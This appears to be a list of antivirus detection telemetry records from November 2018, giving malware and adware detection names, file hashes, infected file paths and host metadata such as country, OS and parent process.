  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050821-49fa5545', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050821-49FA5545', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='776c8a655223bb78aabb527de3a874268b201a674929dfbc02c149a7b9325265', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-27\\776C8A655223BB78AABB527DE3A874268B201A674929DFBC02C149A7B9325265', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='776c8a655223bb78aabb527de3a874268b201a674929dfbc02c149a7b9325265', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:16:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211706-16bc05d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19e2935b\\AVSCAN-20181102-211609-0ECF2CD1\\AVSCAN-20181102-211706-16BC05D8', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:17:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052002-eb968c7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052002-EB968C7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055406-ae071013', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055406-AE071013', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45C7249BAEEAF3434CE18A12468B50B45F3A759D64E6DA922555D7B684828A59', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='des 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\notulen meeting p2k3 2015\\dokumentasi des 2015\\des 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160253-074974e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160253-074974E9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='3467ffde1260853ebad6d8dcdff007c311c2c0196751609e0c99cfc85132eeed', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='службная записка ключи от зала ихибт_2.exe', filepath='E:\\УФКиС\\служебные записки\\службная записка ключи от зала ИХИБТ_2.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0d2d6a22909d41cd4a4a05ccdedeb4240bc9464b1d44c0cec86029ac3cec1502', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:11:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160151-fcd98c45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160151-FCD98C45', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd worship.exe', filepath='D:\\CD Worship.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mss32midi.dll', filepath='\\?\\J:\\BlackShot\\System\\mss32midi.dll', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='0a2de1e0b9030ef1d54d37e984ebcf14778aa6203413ec1cc1b3be80534f7b71', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='meeting p2k3.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\NOTULEN MEETING P2K3\\MEETING P2K3.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='0e6ee395a2a9ee46eccfddff00e83536bb187d60776d63cffc76c7702e18c466', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T20:33:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh345a', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH345A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T16:43:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145508-909acb3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_334756d5\\AVSCAN-20181101-144333-27AA0314\\AVSCAN-20181101-145508-909ACB3B', filesize=1152000, name='PUA/BitcoinMiner.#M1.#R1'), hash='3a5d39d3cacda3b817671ac907c5eeccaec5f073a57537e5d3cccba77a1cfdf1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oldfunk.exe', filepath='\\\\?\\D:\\OLDFUNK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155756-d54f2da4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155756-D54F2DA4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160349-10b2a5ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160349-10B2A5FF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2757616, timestamp='2018-11-01T02:36:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh4ebe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH4EBE', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\New folder\\EquiMiner\\Database\\Resources\\Miners\\EWBF_200_9\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/V', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=59392, timestamp='2018-11-01T03:11:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184717-233fbffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a201de49\\AVSCAN-20181101-184706-21661DA6\\AVSCAN-20181101-184717-233FBFFC', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:47:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T13:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195136-ccf5baf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195136-CCF5BAF0', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:51:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-214659-381e66d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93bac124\\AVSCAN-20181031-214509-2A1935B3\\AVSCAN-20181031-214659-381E66D8', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:47:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210421-4a55da46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210421-4A55DA46', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141652-079072aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c714bc1\\AVSCAN-20181101-141620-030E3D0C\\AVSCAN-20181101-141652-079072AA', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T07:16:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124536-46ee9dea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124515-357ACE1A\\AVSCAN-20181101-124536-46EE9DEA', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:57:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sg[1].exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\1JX3HJWG\\sg[1].exe', filesize=4296000, name='PUA/Vbates.Gen.#M300.#R6704'), hash='92016ab03403b51745ee82018a3ceac38ce8d6f4ead9d6143eeb289088eee936', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:36:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.android.contacts.exe', filepath='G:\\Android\\data\\com.android.contacts.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='bbd4091a14df0b36659c02cc3d781d16be0c6a17572212c2413a513955db0eb7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195734-1764b5b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195734-1764B5B8', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='d71a62cb49101a4baa98cde34212846f385cc36665fda27f952d16a1d7eedfe4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210434-4bc4c824', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210434-4BC4C824', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='67d41aa654a042c9fdba9127538c263e8e153fcd2347c815a690dd30db380bda', metadata=Row(cmdline='\\\\\\/Embedding', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T02:34:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211832-b1fd7656', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211832-B1FD7656', filesize=3776000, name='TR/Dropper.Gen.#M300.#R3861'), hash='ceb610e3c14002a680b0aa70eae832b14011b212c247a18974dbcb7fafff663a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103511-cd00e636', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-092014-6338D188\\AVSCAN-20181101-103511-CD00E636', filesize=188000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='ba936ee3a3c7ccbdcfeefa196bd8a659827e41ccc7e48c2d964a2df363a91733', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:35:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215553-7fc1ef47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae9b16be\\AVSCAN-20181101-215525-7B265514\\AVSCAN-20181101-215553-7FC1EF47', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:54:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d10770e56fffddbe56bdbe63c9398a26880e465c930fac193e267572bea05c64', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\D10770E56FFFDDBE56BDBE63C9398A26880E465C930FAC193E267572BEA05C64', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='d10770e56fffddbe56bdbe63c9398a26880e465c930fac193e267572bea05c64', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:43:14Z'), dt=datetime.date(2018, 11, 1)),
